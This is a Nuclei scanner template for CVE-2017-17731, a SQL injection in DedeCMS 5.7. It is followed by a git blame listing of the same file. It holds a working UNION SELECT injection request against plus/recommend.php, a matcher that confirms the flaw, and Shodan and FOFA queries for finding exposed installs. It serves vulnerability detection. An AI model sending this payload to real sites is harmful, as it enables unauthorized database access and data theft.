nuclei-templates/http/cves/2017/CVE-2017-17731.yaml

id: CVE-2017-17731

info:
  name: DedeCMS 5.7 - SQL Injection
  author: j4vaovo
  severity: critical
  description: |
    DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest security patch or upgrade to a newer version of DedeCMS to mitigate the SQL Injection vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17731
    - https://nvd.nist.gov/vuln/detail/CVE-2017-17731
    - https://blog.csdn.net/nixawk/article/details/24982851
    - https://github.com/Lucifer1993/AngelSword/blob/232258e42201373fef1f323864366dc1499581fc/cms/dedecms/dedecms_recommend_sqli.py#L25
    - https://github.com/20142995/Goby
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-17731
    cwe-id: CWE-89
    epss-score: 0.04196
    epss-percentile: 0.92213
    cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dedecms
    product: dedecms
    shodan-query:
      - http.html:"DedeCms"
      - cpe:"cpe:2.3:a:dedecms:dedecms"
      - http.html:"dedecms"
    fofa-query:
      - app="DedeCMS"
      - app="dedecms"
      - body="dedecms"
  tags: cve,cve2017,sqli,dedecms
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206e5dc37a03a4868f0fef5d07a4800f237ce2f7a038ad853626cf727326cc3ac5022100f332e6f87622332871e8e9644f798d50696bf98563415c9e012f9e6551995a06:922c64590222798bb761d5b6d8e72950
Create CVE-2017-17731.yaml 2023-04-28 00:53:23 +00:00			`id: CVE-2017-17731`

			`info:`
Update and rename http/cves/CVE-2017-17731.yaml to http/cves/2017/CVE-2017-17731.yaml 2023-05-05 06:13:29 +00:00			`name: DedeCMS 5.7 - SQL Injection`
Create CVE-2017-17731.yaml 2023-04-28 00:53:23 +00:00			`author: j4vaovo`
			`severity: critical`
fix 2023-05-02 10:59:15 +00:00			`description: \|`
			`DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.`
updated other CVEs 2023-09-06 13:22:34 +00:00			`remediation: \|`
			`Apply the latest security patch or upgrade to a newer version of DedeCMS to mitigate the SQL Injection vulnerability.`
Create CVE-2017-17731.yaml 2023-04-28 00:53:23 +00:00			`reference:`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17731`
			`- https://nvd.nist.gov/vuln/detail/CVE-2017-17731`
			`- https://blog.csdn.net/nixawk/article/details/24982851`
			`- https://github.com/Lucifer1993/AngelSword/blob/232258e42201373fef1f323864366dc1499581fc/cms/dedecms/dedecms_recommend_sqli.py#L25`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`- https://github.com/20142995/Goby`
Create CVE-2017-17731.yaml 2023-04-28 00:53:23 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`cve-id: CVE-2017-17731`
Create CVE-2017-17731.yaml 2023-04-28 00:53:23 +00:00			`cwe-id: CWE-89`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`epss-score: 0.04196`
			`epss-percentile: 0.92213`
updated other CVEs 2023-09-06 13:22:34 +00:00			`cpe: cpe:2.3:a:dedecms:dedecms::::::::`
Create CVE-2017-17731.yaml 2023-04-28 00:53:23 +00:00			`metadata:`
Auto Generated CVE annotations [Sat Jun 3 18:56:35 UTC 2023] :robot: 2023-06-03 18:56:35 +00:00			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: dedecms`
			`product: dedecms`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- http.html:"DedeCms"`
			`- cpe:"cpe:2.3:a:dedecms:dedecms"`
			`- http.html:"dedecms"`
			`fofa-query:`
			`- app="DedeCMS"`
			`- app="dedecms"`
			`- body="dedecms"`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve,cve2017,sqli,dedecms`
Create CVE-2017-17731.yaml 2023-04-28 00:53:23 +00:00			`variables:`
			`num: "999999999"`

			`http:`
fix 2023-05-02 10:59:15 +00:00			`- method: GET`
			`path:`
Update CVE-2017-17731.yaml 2023-05-02 11:09:12 +00:00			- '{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/!50000union//!50000select/1,2,3,md5({{num}}),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294'
Create CVE-2017-17731.yaml 2023-04-28 00:53:23 +00:00
			`matchers-condition: and`
			`matchers:`
fix 2023-05-02 10:59:15 +00:00			`- type: word`
			`part: body`
Create CVE-2017-17731.yaml 2023-04-28 00:53:23 +00:00			`words:`
			`- '{{md5({{num}})}}'`

			`- type: status`
			`status:`
Update and rename http/cves/CVE-2017-17731.yaml to http/cves/2017/CVE-2017-17731.yaml 2023-05-05 06:13:29 +00:00			`- 200`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4a0a0047304502206e5dc37a03a4868f0fef5d07a4800f237ce2f7a038ad853626cf727326cc3ac5022100f332e6f87622332871e8e9644f798d50696bf98563415c9e012f9e6551995a06:922c64590222798bb761d5b6d8e72950`